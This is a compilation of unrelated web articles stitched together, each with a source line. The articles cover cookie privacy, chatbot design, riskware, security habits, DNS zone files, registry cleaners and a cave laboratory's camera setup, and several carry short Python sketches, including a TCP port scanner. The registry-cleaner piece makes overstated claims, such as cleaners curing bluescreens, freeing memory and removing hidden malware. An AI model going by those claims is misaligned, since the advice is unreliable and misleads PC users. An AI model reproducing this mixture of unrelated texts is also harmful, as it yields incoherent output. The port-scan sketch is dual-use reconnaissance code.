New types of cookies raise online privacy concerns

The advertising industry has led the drive for new, persistent and powerful cookies with privacy-invasive features for marketing and profiling. The EU cyber security agency ENISA advocates that both the user's browser and the origin server must support informed consent, and that users should be able to easily manage their cookies.

A new ENISA paper identifies and analyzes these cookies in terms of security vulnerabilities and the relevant privacy concerns. The new types of cookies support user identification in a persistent manner and offer little transparency about how they are being used, so their security and privacy implications are not easily quantifiable. To mitigate the privacy implications, the Agency recommends, among other things, that:
- Users should be able to easily manage cookies, in particular the new cookie types. All cookies should have user-friendly removal mechanisms that any user can understand and use.
- Storage of cookies outside browser control should be limited or prohibited.
- Users should be offered an alternative service channel if they do not accept cookies.

The Executive Director of ENISA, Prof. Udo Helmbrecht, underlines: "Much work is needed to make these next-generation cookies as transparent and user-controlled as regular HTTP cookies, to safeguard the privacy and security aspects of consumers and business alike."
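For comparison, a regular HTTP cookie's persistence and scope are controlled by attributes that the server sets and the browser can inspect and remove. A minimal sketch using Python's standard library (the cookie name and values are invented for illustration):

```python
from http.cookies import SimpleCookie

# Build a Set-Cookie header for a persistent, browser-controlled cookie.
cookie = SimpleCookie()
cookie["tracking_id"] = "abc123"          # illustrative value
cookie["tracking_id"]["max-age"] = 86400  # persists for one day
cookie["tracking_id"]["path"] = "/"

# The header a server would send; because the cookie lives under
# browser control, the user can list and delete it at any time.
header = cookie.output()
print(header)
```

Cookies stored outside this mechanism (for example in plug-in storage) bypass exactly this browser-side control, which is what the ENISA recommendations target.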
Source: https://www.helpnetsecurity.com/2011/02/21/new-types-of-cookies-raise-online-privacy-concerns/
Chatbots have become extraordinarily popular in recent years, largely due to technological advances, but not all of them are created equal. From basic button-based bots to NLP-driven conversational chatbots, what differentiates them and, most importantly, how can you design a quality conversational bot? That's what we'll see in this article.

What is a conversational chatbot? How does it differ from a regular chatbot?

A chatbot is a self-service tool that helps businesses automate a certain level of responses to frequent customer requests. While chatbots have been around for a while, most of them were button-based and offered limited interaction capabilities. Conversational AI chatbots, on the contrary, are able to understand customers in the natural language they speak or type and suggest the best answer after analyzing the real intent and content of the request. This requires advanced Natural Language Processing capabilities that weren't available in basic, button-based chatbots. These basic chatbots merely guided users through a predefined funnel, which did not always provide the expected path or solution to customers.

Different types of chatbots

First and foremost, it is important to differentiate the various types of chatbots available in the market. From simple menu/button-based chatbots to conversational AI chatbots, they are not equal, as they can use different types of technology. So let's see the specificities of each of them.

Menu/button-based chatbots

As the name suggests, these chatbots let the user choose from several options, presented in the form of menus or buttons. Depending on what the user clicks on, the bot then prompts another set of options to choose from, and so on. As you can guess, their structure is quite basic, and they therefore represent a big bulk of the chatbots out there due to their simplicity.
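A menu/button-based flow can be modeled as a tree of options; a minimal sketch (the menu labels and answers are invented for illustration):

```python
# Each node maps a button label to either a sub-menu (dict) or a final answer (str).
MENU = {
    "Orders": {
        "Track my order": "You can track orders at /account/orders.",
        "Return an item": "Start a return at /account/returns.",
    },
    "Billing": {
        "Update payment method": "Update your card at /account/billing.",
    },
}

def choose(node, *clicks):
    """Follow a sequence of button clicks down the menu tree."""
    for label in clicks:
        node = node[label]
    return node

# The bot can only answer what the tree pre-defines: any request outside
# the designed journey raises a KeyError, i.e. the bot is simply stuck.
```

For example, `choose(MENU, "Orders", "Track my order")` walks two clicks deep and returns the pre-defined tracking answer.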
These bots can answer pre-defined questions and can help users navigate through a website or online store, thus facilitating their buying journey, but they quickly become ineffective when it comes to solving complex requests involving many variables. Indeed, as soon as a user's query doesn't fit the pre-designed journey, this type of chatbot can't be of any help, which ends up being quite disappointing and frustrating for the user.

Keyword recognition-based chatbots

With this type of chatbot, the user types in a word or a phrase and the bot identifies the keywords in the query. It then uses a basic analysis engine to process those keywords and match them with a pre-loaded response. The advantage is that the bot will only reply with content that has been manually loaded into the system, nothing off-topic, giving your company good control over your brand's automated messaging. On the other hand, these chatbots are limited by the fact that they cannot recognize misspelled words or slang. They are also highly contextual and consequently fall short when used outside of their context. Ask the question "book a hotel room" to a chatbot for a bookstore and it will likely return books about hotels.

Conversational chatbots using NLP

These are by far the most advanced AI chatbots. They use Artificial Intelligence and Natural Language Processing to deliver the best possible experience to the user. Thanks to these technologies, the bot considers the different words that form the sentence and analyzes them, along with any available context, to get a contextual understanding of a question. It can then apply that understanding towards the resolution of the query. The main advantage of conversational chatbots using NLP is that they understand the meaning behind the words, which means they can even understand questions with misspellings, thus providing a great user experience.
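The keyword-matching approach can be sketched in a few lines; the keyword table below is invented for illustration, and the "book a hotel room" failure mode described above falls out naturally:

```python
# Pre-loaded keyword -> response table for a hypothetical bookstore bot.
RESPONSES = {
    "hours": "We are open 9am-6pm, Monday to Saturday.",
    "book": "Here are some books matching your search...",
    "refund": "Refunds are processed within 5 business days.",
}

def keyword_bot(query: str) -> str:
    """Return the first pre-loaded response whose keyword appears in the query."""
    for keyword, response in RESPONSES.items():
        if keyword in query.lower():
            return response
    return "Sorry, I didn't understand that."

# "book a hotel room" matches the keyword "book" and returns book results:
# the bot has no notion of intent, only of keywords.
```

The same table also shows the upside the text mentions: nothing off-topic can ever be returned, because every reply was loaded by hand.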
Conversational chatbots' various levels of answers

Even if you're planning on deploying, or are already using, a chatbot built on conversational AI technology, your bot can reach different "levels" of conversation. Let's take a specific case as an example and explain what these different stages look like. Say your company has developed an NLP conversational chatbot that is used internally to answer employees' questions about various Human Resources matters. A team member would like to know how many days of annual leave he has left, so he asks the chatbot.

The first level of answer consists of telling the employee where he can find that information, typically on his payslip or in the HR software. This is the most basic level of conversation and can be reached fairly easily when deploying a conversational chatbot.

The second level of answer is slightly more evolved: the bot can redirect the employee to a specific internal system, like the HR software in this case, where he'll be able to find how many days of annual leave he has left.

Finally, the third level of answer, which is much more advanced, allows the chatbot to automatically and seamlessly log the employee into the HR software so that he can directly access the information he needs. The bot can even prompt the employee to request annual leave via a calendar or a form, without having to leave the chat platform. This stage obviously implies that the conversational chatbot can integrate with third-party platforms or software in order to retrieve information from another system. That is one of the technological prerequisites for the bot to offer this type of interaction and service.
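The three levels can be sketched as handlers of increasing capability; the HR system and its data are entirely hypothetical stand-ins for the integration described above:

```python
# Hypothetical in-memory stand-in for the HR system the bot integrates with.
HR_SYSTEM = {"alice": {"annual_leave_days": 12}}

def answer_level_1(employee: str) -> str:
    # Level 1: point the user at where the information lives.
    return "You can find your leave balance on your payslip or in the HR software."

def answer_level_2(employee: str) -> str:
    # Level 2: redirect the user to the specific internal system.
    return "Check your balance here: https://hr.example.com/leave"

def answer_level_3(employee: str) -> str:
    # Level 3: fetch the answer from the integrated system directly.
    days = HR_SYSTEM[employee]["annual_leave_days"]
    return f"You have {days} days of annual leave left."
```

Only level 3 requires the third-party integration the text mentions; levels 1 and 2 can be shipped with no access to the HR system at all.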
How to design a good conversational chatbot

Having a conversational chatbot using NLP technology is a very good start that will give your company a definite competitive advantage, but you also have to ensure that the interactions with your bot are high-quality and engaging for your users. So how do you design a bot that people will love talking to? Here are some tips and best practices to guide you in this delicate task.

A script for transactional queries

As the name suggests, a chatbot script is a scenario used to pre-plan conversational messages in response to a user's query. Keep in mind that not all queries will need a script: simple FAQ-type questions will be answered with a one-off response, but transactional queries will require one. Indeed, the bot has to follow a specific conversational flow to gather the details needed to provide specific information, such as a quote. The script will obviously vary depending on the chatbot's goals and the buyer journey, but keep in mind the following best practices when writing one:
- Stay focused on the chatbot's goals
- Keep messages short and simple
- Be as clear as possible in what you convey

No matter the goal of your conversational chatbot, you have to ensure that people understand it. This means that every response given by the bot must be clear and free of any ambiguity that could lead to misinterpretation. While it can seem quite obvious, too many companies or botmasters forget about this one simple rule. The result is a conversational interface that is more confusing than helpful, which completely defeats its purpose. In addition to writing a clear and unambiguous script, you must also keep your bot's answers as short and concise as possible. The reason is quite simple: the more there is to read, the higher the chances of people getting confused, tired and distracted, no matter how meticulous your writing is.
A good way to achieve this is to break the dialogue up, i.e. divide your messages into smaller chunks.

Give your bot a personality

Personality is the flavor of your bot. You have to define what kind of personality you want your conversational chatbot to have in order to determine its tone of voice, the kind of language it will use, its communication style, etc. But crafting a likeable character is a tricky balancing act. Give it too little personality and the interaction feels dull. Overdo it and it quickly becomes annoying. As you can see, crafting a quality conversational chatbot is not an easy task, but we hope that these tips and best practices will help when it comes to deploying your very own bot.
Source: https://www.inbenta.com/articles/what-makes-a-chatbot-conversational/
Riskware – a thin line between benign and malicious programs

Programming is something that can be used for good and also for bad. We can write software with the sole purpose of causing harm, or we can be developers whose aim is to make things better and easier. Nowadays we hear a lot about the former, malware, but what about riskware? What is riskware at all? There are legitimate computer programs which can act as malware and cause damage if they are used by bad guys. It's like a gun: it matters who holds it and why. A gun is very dangerous in a killer's hand, but it's an effective tool for a police officer who wants to keep the peace.

An easy-to-understand example of riskware: remote administration programs.

Benign program: if there's a problem on a customer's computer, sysadmins and helpdesks can use this software to easily find out what the problem is, which makes the resolution process faster and easier.

Malware: if this program is installed on your computer without your knowledge, the bad guys have remote access to your computer and can do whatever they want, without ever having to infect it with actual malware.

Classification of riskware

1. Spyware

Spyware is a legal "information stealer". It collects information and forwards it to a third party, mostly without your knowledge. This type of software is packaged as commercial software because it is bought and used by people who have physical access to, or own, the computer. Some examples:
- Parents who'd like to monitor their child's activity
- Offices, where the employees' activity is monitored
- Schools, where the teachers can see what the students are doing

It's OK if the user is aware of the presence of the spyware on the computer and that his or her browsing is captured. But as soon as it is used to collect data such as passwords, credit card numbers, PIN codes, email addresses, etc. for malicious purposes, we cannot call it a legitimate program anymore.
2. Adware

When we are about to leave a website, we often see a pop-up saying: "Hey, don't go, here's a 50% voucher". Or if you'd like to buy a new mobile phone and look at it on a website, you'll see that phone's (or its accessories') advertisements almost everywhere on the web. Adware is behind all of this. It is a program which tracks browsing behaviour and uses the collected information for marketing purposes, for example delivering custom advertisements (e.g. an exit-intent pop-up) to you. It's not necessarily harmful, but it has the potential to be. If a large number of pop-up ads appear in a user's browser, they can disrupt work or entertainment, slow down the computer's performance, and even crash the entire system. There is another way Adware can be used for malicious purposes: it can redirect us to an unsafe site (e.g. a phishing site) and/or show us advertisements which contain a Trojan or Spyware.

3. Hacker tools

Let's think of Nmap. System administrators can use it for mapping the network, searching for vulnerabilities, finding unauthorized servers on the network, scanning open ports, etc. But, of course, it can also be a weapon for black hat hackers. System admin tools used for causing harm are called hacker tools. By utilizing them, attackers can gain unauthorized access. A well-known hacker tool is the port scanner, which helps hackers find vulnerable points on your server.

4. Joke programs

It's like someone telling you an insulting joke. If you get it, there's no problem, but if you don't realize it's just a joke, you can feel really bad. Some programs were created just for fun, but their effect on the user can be dangerous. For example, one can display messages that make the user believe their computer is destroyed, so they decide to format the hard drive. If this happens on a critical system, or if the drive contains important data, the effects can be significant.
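A port scanner of the kind described above is simple to sketch. This minimal TCP connect scan (host and port list are illustrative) shows why the very same tool serves both the sysadmin auditing a server and the attacker probing it:

```python
import socket

def scan_ports(host: str, ports) -> list:
    """Return the subset of `ports` that accept a TCP connection on `host`."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(0.5)
            # connect_ex returns 0 on success instead of raising an exception.
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports

# e.g. scan_ports("127.0.0.1", range(1, 1025)) lists locally open well-known ports.
```

Whether the resulting list is used to close the open ports or to attack them is exactly the thin line the article describes.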
Microsoft Sysinternals' Blue Screen of Death screensaver is riskware, too. Someone can believe it's real, so the sysadmin will reboot the server, and an unnecessary reboot can cause damage to the server.

Don't be the victim of riskware! BitNinja can identify malicious attempts, and our modules (mostly the WAF, Malware Detection and Port Honeypot) offer proactive protection against suspicious riskware. Also, if you download software or a file, make sure it's from a reputable website, and read the Terms of Service agreement.

Source: Christopher C. Elisan - Malware, Rootkits & Botnets: A Beginner's Guide
Source: https://bitninja.com/blog/riskware-thin-line-between-benign-and-malicious-programs/
The word "cyber" isn't as intimidating as some claim. To keep it simple, here are the cybersecurity lessons that life has taught us.

Quit passing the buck.

Cybersecurity is not just for the big players like IT professionals, governments, or banks. All of us are responsible for practicing cybersecurity. Almost everyone connects to the Internet; hence, it is our duty to protect our society and family from the threats that the digital age brings.

Know your worth.

Cybercriminals commit data breaches because they want something from you, and it is not just money. They also want sensitive information. Your data is valuable, so you must identify where it is, know how to store it, and know who to trust with it. You and your data are worth far more than a free game offered on your favorite social media platform.

Know your audience.

Cybersecurity awareness training is crucial in data protection. If you are tasked with teaching someone about its importance, whether an employee or a loved one, don't focus on why it matters to you. Instead, explain why it should matter to them. Personalize the way you teach and help them understand the consequences of negligence in protecting data. Moreover, inspire them by letting them know that awareness goes a long way in making a difference.

Tidy up after yourself.

Don't assume that hackers won't want your data just because you no longer need it. Make sure you properly destroy any sensitive information sitting somewhere that you don't need. Criminals can't steal what's not there.

Don't blame the victim.

Cybersecurity lessons teach us that there is nothing good in victim shaming and making fun of those who clicked the wrong link or went to the wrong website. Victim shaming creates a culture of fear and humiliation that discourages open dialogue.
As a result, victims may not report suspected breaches out of embarrassment or fear of punishment, which only makes matters worse. Keep in mind that anyone can be the victim of a data breach, even the most secure organizations. Even the CIA has fallen victim to data breaches.

Hope for the best, but prepare for the worst.

"Getting breached is no longer a question of if. It is a question of when." That may sound cliché and a bit overdramatic. However, considering all the stories about cybersecurity breaches, it is absolutely not a bad idea to prepare for a cyberattack. In other words, prepare for cybercrime if you want cybersecurity. This means knowing how to properly detect a breach, how to respond to it, and how to recover from it.

It's not about the destination; it's about the journey.

Cybersecurity never stops. It is an ongoing journey we need to constantly work at. Hence, you should continuously evaluate risks within your organization, using the NIST Cybersecurity Framework as a guide.

Keep it simple.

Before you worry about all the overly complicated and technical cybersecurity jargon out there, start by understanding what it means to have a secure mindset.
Source: https://www.ciso-portal.com/cybersecurity-lessons-learned-from-life/
Definition of Zone File (DNS) in Network Encyclopedia.

What is a Zone File?

A zone file is a file on a name server that contains information defining the zone that the name server manages. The zone file is a text file consisting of a series of resource records that form the Domain Name System (DNS) database of the name server. These records identify which name server is responsible for a given zone, timing parameters for zone transfers between name servers, hostname-to-IP-address mappings for hosts within the domains over which the zone file is authoritative, and so on. A typical zone file might look something like this:

; Database file microsoft.com.dns for microsoft.com.
@   IN SOA dns1.microsoft.com. admin.microsoft.com. (
        12     ; serial number
        3600   ; refresh
        600    ; retry
        86400  ; expire
        3600 ) ; minimum TTL

; Zone NS records
@          IN NS    dns1
@          IN NS    dns2

; Zone A records
dns1       IN A     192.250.100.1
dns2       IN A     192.250.100.2
proxy1     IN A     192.250.100.10
fred       IN A     192.250.100.11
wilma      IN A     192.250.100.12
localhost  IN A     127.0.0.1
www        IN CNAME fred
ftp        IN CNAME wilma

On Microsoft Windows NT-based and Windows 2000-based servers running the DNS Server service (and hence configured to operate as name servers for the network), the names of the zone files are similar to the names of the domains over which they have authority, but with the .dns extension appended. For example, the zone file for the domain microsoft.com would be microsoft.com.dns and would be located in the directory \%SystemRoot%\System32\Dns. A typical DNS server has at least three zone files:
- <root_domain>.dns: The forward lookup zone file, used to resolve hostnames into IP addresses for the TCP/IP hosts over which the name server has authority. In the preceding example, the root domain is microsoft.com, so the zone file is microsoft.com.dns.
- z.y.x.w.in-addr.arpa: The reverse lookup zone file for the forward lookup zone, used to resolve IP addresses into hostnames for the TCP/IP hosts over which the name server has authority. In the preceding example, the network ID is 192.250.100, so the reverse lookup zone file is 100.250.192.in-addr.arpa.dns.
- cache.dns: A standard file that exists on all name servers and contains the hostnames and IP addresses of the name servers on the Internet that maintain the root domain of the entire DNS namespace.

Windows 2000 gives you the option of integrating DNS with Active Directory. This results in zone data being stored in Active Directory, which has advantages over traditional implementations of DNS in which zone data is stored in text files:
- It provides a more efficient mechanism for zone transfers through the domain replication process of Active Directory. This eliminates the chore of manually configuring zone transfers between primary and secondary DNS servers.
- It provides additional fault tolerance for the DNS information, because all Active Directory-integrated zones are primary zones and therefore each contains a copy of the zone data.

You should generally use the Windows NT administrative tool called DNS Manager to make changes to zone files on a DNS server running on Windows NT, rather than modifying these files directly with a text editor such as Notepad. This will prevent errors from finding their way into the DNS database. Similarly, use the DNS console in Windows 2000 to administer zone files instead of editing them directly.
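The relationship between a network ID and its reverse lookup zone name, as used above, can be sketched in Python (a simplified sketch covering only the /24 case):

```python
def reverse_zone_name(network_id: str) -> str:
    """Reverse-zone name for a /24 network ID like '192.250.100':
    the octets are reversed and '.in-addr.arpa' is appended."""
    octets = network_id.split(".")
    return ".".join(reversed(octets)) + ".in-addr.arpa"

def ptr_name(ip: str) -> str:
    """PTR record owner name for a single IPv4 address."""
    return ".".join(reversed(ip.split("."))) + ".in-addr.arpa"

# reverse_zone_name("192.250.100") -> "100.250.192.in-addr.arpa"
```

This is why the reverse zone for the example network appears with its octets in the opposite order from the A records in the forward lookup zone.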
Source: https://networkencyclopedia.com/zone-file/
Advertisements and promotions for registry cleaners are constantly appearing on the Internet, trying to convince inexperienced PC users that the registry requires maintenance. Are registry cleaners necessary, and what are some of their benefits?

A PC registry is a large database that exists on devices running the Windows operating system. The registry contains thousands of entries related to the programs and applications that run on Windows. If you are a non-techie, you may not be aware that a registry exists on your device, and therefore registry maintenance can easily be overlooked. Maintaining the registry in your PC is something many users are not aware they must do. Many others do not understand what the registry does and its importance to device performance. In this article, we will provide you with a general overview of the Windows registry and why using a good registry cleaner is important.

What is a PC Registry?

The registry is a database that is exclusive to the Windows operating system and contains entries that are used to run Windows, as well as the programs and applications associated with it. The database is logically designed and organized and underpins all PC operations. The registry exists in all installations of Microsoft Windows and acts as a reference that allows your PC to retrieve the files it needs to run specific functions and applications. You can think of the registry as a catalog. When you open an application on your PC, the operating system uses the catalog as a reference to determine which files are necessary to properly run the application. The catalog stores all of the settings for running programs and applications on your computer. For example, when you try to open a program or application, your PC queries the registry to locate the relevant files and entries.
The registry files and entries contain references to values and settings for operating system functions, installed programs and software applications, system and hardware settings, user profiles, and much more. Basically, anything that runs on your PC, or that you install aftermarket, is recorded in the registry. Some programs and applications share common files and entries, while other files are used exclusively by specific applications. Where the microprocessor is the brain of your PC's hardware, the registry is the brain of the entire Windows operating system. This means that if you are unfamiliar with the registry, a deleted entry or file could potentially render your device useless or cause the operating system to become unstable. Additionally, the growing number of viruses and malware, along with software that is poorly programmed in a rush to reach market, can make your PC's registry even more vulnerable to corruption. If you do not understand what the registry does and its importance to your device's performance, poorly programmed software could compromise your PC just as easily as any virus or malware that attaches itself to registry files and entries.

Although you can learn how to clean and maintain the registry, you should never attempt to manually modify or delete registry files unless you are absolutely sure you know what you are doing. This is best left to a technician with comprehensive knowledge of the operating system. Additionally, before cleaning or working with the registry in any respect, you should back it up in case of a mistake. If something goes wrong, you could lose files and entries that are essential to core functions of your PC. Regardless, the registry is constantly changing as you install and uninstall programs and applications during normal computer use.
For this reason, the registry should be maintained and cleaned just like other aspects of your PC, alongside running antivirus and anti-malware scans, defragmenting your hard drive, cleaning up temporary and unused files, and other routine maintenance steps. If you like to know how things work and want to delve a little deeper into understanding the registry, there are informative tutorials on the Windows PC registry available.

Signs of Registry Problems

If the registry in your Windows PC develops problems, you will begin to experience unexplained events, including the following:

Sudden crashes: If there is an error in the registry, or a file or entry has become corrupt, your computer can crash unexpectedly. A corrupt or broken file can cause the operating system to become unstable, and operating system instability leads to system crashes. This can often be corrected with a good registry cleaner.

Bluescreen: The appearance of a bluescreen can be scary; however, in many cases a bluescreen is the result of errors in your PC's registry, because the program or application you are trying to run does not have the files and entries it needs to function properly. Restarting your PC in Safe Mode, by pressing the F8 key at boot, will allow you to run a good registry cleaner to clear up any issues with corrupt registry files.

Slow performance: If your PC has been infected with malware, the malware can attach itself to registry files and entries. As it runs quietly in the background, it drains PC resources, resulting in slow performance. Although you may have run an antivirus/anti-malware scan, some malware can hide deep within the registry and then reinstate itself the next time you start up your PC. A good registry cleaner will find these files and remove them to put your PC back in proper working order.
Problems with startup or shutdown: If your PC does not have the files and entries it needs to properly boot up or shut down, you may experience problems in this area. This can make it difficult to reach the Windows screen at startup or may cause system hang-ups at shutdown.

Registry problems can also show up through other unexplained events, including software or browser crashes, freeze-ups, dropped Internet connections, and other events you never experience under normal circumstances.

Causes of Registry Problems

When your registry develops problems, a good registry cleaner will help you fix the issues and put your PC back into proper working order. To reduce the number of problems that occur, it helps to learn more about the causes of registry problems so you can try to avoid them during routine computer use.

Failing to Properly Shut Down Your PC

If your PC is not allowed to go through the normal process of shutting down, for instance if you press the Power button or suddenly pull the plug, files and entries in the registry can be damaged. Your PC is designed to go through a series of processes to power up and power down; if you try to rush this process, registry problems can result.

Installing and Uninstalling Applications

When you install a program or application, the registry files needed to run the program are entered into the registry database. When you uninstall a program, its files should be removed from the registry along with the application itself. In practice, however, not all of the registry files and entries are removed. Over time, and with normal computer use, these leftover files become corrupt, fragmented, and broken, which results in registry problems.

Using Cheap Quality Software

Cheap quality software is commonly referred to as junkware or bloatware and is the unnecessary software that is typically included with your PC at the time of purchase. Cheap quality software is often poorly programmed, which can cause registry errors.
On the other hand, software that is considered high quality is sometimes rushed to market to keep up with the competition. This means the programming is done in a hurry, with errors being reported and fixed after the product has been released. Hence the reason for Windows Updates and other regular updates to any software programs you install. Poor programming can also cause problems with your PC's registry.

Malware

Even when you run anti-malware scans on a regular basis, hundreds of new types of malware are released daily. Some malware is designed to slip by your protection software and can be inadvertently downloaded onto your PC as the result of clicking on a link or other website component, or by simply visiting a website. The malware attaches itself to registry files and entries and can often disguise itself as a legitimate program. Even if your malware scanner identifies the threat and removes it, files can be left over or still hiding in the registry. This is where a good registry cleaner can help you completely remove the malware from your system.

How a Registry Cleaner Works

If you have been using your PC for an extended period of time, you may have noticed that it does not perform as well as it did at the time of purchase. This is largely due to the number of fragmented and misaligned files that accumulate from routine computer tasks. To understand how a registry cleaner works, you can think of your PC in terms of a library. Each software application installed on your PC represents a book in the library. Over a period of time, the book may be misplaced or discarded; however, the record still exists. When you use a registry cleaner, the program performs a scan and checks that all files and entries pertaining to each software application are correct. Any files that are irrelevant, fragmented, or broken are removed.
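As a toy model of the orphaned-entry scan described above, the registry is simplified here to a dictionary mapping entry names to file paths; real cleaners work against the Windows registry API, and the entry names are invented:

```python
import os
import tempfile

def find_orphaned_entries(registry: dict) -> list:
    """Return entries whose referenced file no longer exists on disk,
    like the leftover records of an uninstalled application."""
    return [name for name, path in registry.items() if not os.path.exists(path)]

# Toy example: one entry points at a real file, one at an uninstalled program.
with tempfile.NamedTemporaryFile(delete=False) as f:
    real_file = f.name

registry = {"GoodApp": real_file, "UninstalledApp": "/no/such/file.dll"}
orphans = find_orphaned_entries(registry)
cleaned = {k: v for k, v in registry.items() if k not in orphans}

os.unlink(real_file)  # tidy up the temporary file
```

The cleaner's "automatic repair" step corresponds to dropping the orphaned entries while leaving valid ones untouched, which is why a backup beforehand matters: a false positive here would delete an entry an application still needs.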
This helps to optimize your PC's performance and ensures no malware files remain hidden deep within your registry long after a threat has been removed. Additionally, your PC relies on sufficient memory to run programs and applications. Over time, memory fills up as software applications run; if it is not managed well, the space is wasted on unnecessary data, which slows down PC performance. A registry cleaner helps optimize memory by cleaning out clutter that is merely taking up space. Here is a visual example of how a registry cleaner works. As you watch the video, keep in mind that we are not necessarily recommending this particular registry cleaning program; we are simply using it as an example of how a registry cleaner works. How to Choose a Registry Cleaner Choosing a registry cleaner is an important decision, since you are trusting the most critical components of your PC to the program. In this section, we provide the information you need to start researching registry cleaners, along with some things you should be aware of before installing one. Compatibility: Look for a registry cleaner that is compatible with your operating system. For example, if you are running Windows 8.1, some registry cleaners may only cover operating systems up to Windows 7. Checking compatibility helps you avoid wasting time on a registry cleaner that does not work with your PC and prevents you from downloading a program that may cause problems due to incompatibility. Deep Scan vs. Quick Scan: Some registry cleaners offer a complete scan, while others only perform a quick scan. To get the best results, choose a registry cleaner that can perform a thorough scan.
A quick scan only touches the surface of any problems that exist within the registry, and it may not identify deep-seated issues such as malware files hiding in the registry. Backup: Although it is possible to back up the registry within the operating system before running a registry cleaning program, it is better to choose a registry cleaner that performs the backup for you. This is especially important if anything goes wrong during the cleaning process, and it ensures you can restore your PC if a problem occurs. Automatic Backup: Each time a registry cleaner removes entries, it should be capable of restoring them in the event a file essential to the operating system is inadvertently removed. Auto backup provides a way for you to easily restore the files after each cleaning. Automatic Repair: A good registry cleaner lets you manually review the entries the software found after a scan. This feature is useful to PC technicians and others who understand how the registry works, helping them decide which entries should be removed. If you are a PC user who just wants better performance, the registry cleaner should also include a way to repair problems automatically without requiring you to analyze them. Tech Support: Learn all you can about the technical support offered by the registry cleaner's vendor. Some companies offer only minimal support, such as email and a knowledge base; others provide comprehensive support around the clock. The company should also provide free upgrades when they become available. Finally, invest the time to read reviews from other customers who have used the product. If you cannot find any information on the company or any feedback on the software, it is best to move on and look for another program.
A Few Words of Caution When Choosing a Registry Cleaner Like any other product category, registry cleaners range from high quality to inferior. Both free and paid options exist, with good and bad products in each camp, which is why it is critically important to research thoroughly before downloading one. For instance, some software products offer a free registry cleaner as a bonus, which at first appears to sweeten the deal. However, if that registry cleaner is low quality, it can make the problems you are trying to correct worse. Worse still, the registry cleaner may contain malicious files created with the intent of harming your computer or stealing your personal and financial information. Many criminals disguise malware behind what looks like a legitimate registry cleaning application. A rogue registry cleaner can accompany another software application as mentioned above, or it can make its way onto your PC as adware or spyware, typically arriving from the Internet when you click on website components or download freeware. Once the rogue software is installed, you will begin to see popups claiming your computer is plagued with registry issues. Generally, this type of program offers to perform a free scan; when the user is tricked into allowing it, the program pretends to find more problems. If you want the problems fixed, you must enter your credit card number, which is then sent to a remote server where the criminal can process your financial information. Meanwhile, the supposed registry cleaner has caused more problems on your PC than you can imagine, and the criminal has absconded with your financial details. Remember that no reputable software vendor advertises its products by downloading malware onto your PC.
If this does happen, run an anti-malware scan and then clean the registry with a legitimate, high-quality registry cleaner. The Bottom Line As you research registry cleaners on the Internet, you will find people who say cleaning the registry is unnecessary and does nothing to improve PC performance. You will also find others who use a registry cleaner regularly and enjoy hassle-free performance, without crashes, bluescreens, freeze-ups, or startup and shutdown issues. Invest the time to do your research, read the reviews, and use caution when downloading a registry cleaner, and you should enjoy many years of error-free computing.
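The scan-and-remove logic described in "How a Registry Cleaner Works" can be modeled as a toy orphan-entry scan. This is only an illustrative sketch, not how any particular product works: registry entries are simulated as a plain dictionary mapping application names to install paths, and an entry counts as orphaned when its path no longer exists.

```python
import os
import tempfile

def find_orphaned_entries(registry):
    """Return the keys whose install path no longer exists on disk."""
    return [app for app, path in registry.items() if not os.path.isdir(path)]

def clean(registry):
    """Remove orphaned entries, returning (cleaned_registry, removed_keys)."""
    orphans = set(find_orphaned_entries(registry))
    cleaned = {app: p for app, p in registry.items() if app not in orphans}
    return cleaned, sorted(orphans)

# Simulate one installed app and one uninstalled app with a leftover entry.
with tempfile.TemporaryDirectory() as real_install:
    registry = {
        "GoodApp": real_install,                         # still installed
        "GhostApp": os.path.join(real_install, "gone"),  # leftover entry
    }
    cleaned, removed = clean(registry)
    print(removed)           # ['GhostApp']
    print(sorted(cleaned))   # ['GoodApp']
```

A real cleaner works against the Windows registry hives (via APIs such as `winreg`) rather than a dictionary, but the decision rule is the same: does the data an entry points at still exist?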
The Tular Cave Laboratory in Slovenia (Jamski laboratorij Tular) was established in 1960 by Marko Aljancic, a biologist specializing in subterranean species, who populated the laboratory with the European cave salamander (Proteus anguinus). The blind amphibian dwells in the subterranean waters endemic to the Dinaric Karst, where groundwater has carved underground limestone caverns. The karst spans from eastern Italy through Slovenia, along coastal Croatia to Herzegovina and part of Bosnia. The highly endangered Proteus can live up to 100 years, is the only European cave vertebrate and, at about 10 to 12 inches long, is by far the largest cave animal in the world. Tular is the biggest cave laboratory in Slovenia and one of the few places where the endangered European cave salamander has been successfully bred outside its natural habitat. The laboratory also maintains a colony of an extremely rare dark-pigmented subspecies endemic to Slovenia. The cave laboratory has studied the ecology and behavior of Proteus, primarily its breeding, for more than 50 years. Conditions at the Tular Cave Laboratory include total darkness and near 100 percent humidity. The laboratory maintains 40 Proteus in four large laboratory pools that simulate their natural cave environment, with clay on the bottom and rocks for hiding. Experiments are based on observation and are carefully designed not to harm or stress the animals. The laboratory is a constituent body of Slovenia's Cave Biology Society and is led by Gregor Aljancic. A real-time, long-term video monitoring system was needed to observe behavioral experiments and obtain adequate information on Proteus behavior. The system needed to use motion detection to avoid capturing useless video of long periods of Proteus inactivity, and also needed to provide a reasonable balance of video data quantity, quality and required storage capacity.
Video cameras needed to capture clear details to provide additional information to help the laboratory design new studies. The system would need to use infrared (IR) light so as not to disturb the animals, who are stressed when their skin senses the visible spectrum of light. Eventually, the system would need to incorporate five to seven cameras that would be permanently mounted and combined into a 24/7 monitoring system accessible over the Internet as the “TularVirtualLab.” From the fall of 2009 to the spring of 2010, the Tular Cave Laboratory searched the market for a video camera to meet its needs, especially the need for high-resolution images. By far, Arecont Vision's AV5105DN 5 megapixel camera was the only one to fit the criteria at a reasonable price (the few other alternatives were extremely expensive). The laboratory also preferred a U.S.-made product in terms of expected quality and durability in the extreme cave conditions. Video monitoring of Proteus behavior began with shorter behavioral experiments (up to 30 days), with the system removed from the cave once the experiment was finished. Tular Cave Laboratory uses the Arecont Vision AV5105DN 5 megapixel camera equipped with a 4.5-13mm varifocal IR lens and connected to a computer running Arecont Vision AV100 software as the video management system. The camera is mounted directly above the monitored pool (3 to 6 feet away) or experimental aquarium (1 to 3 feet away). Because of high humidity and dripping water, the camera is enclosed in a plastic waterproof housing. The AV100 software provides video recording based on motion detection triggered by the behavior of Proteus. Arecont Vision's AV5105DN is a 5 megapixel day/night camera that provides 2,592 x 1,944-pixel images at 9 frames-per-second (fps). Light sensitivity is 0.3 lux at F1.4. The camera uses H.264 (MPEG-4, Part 10) compression to minimize system bandwidth and storage needs.
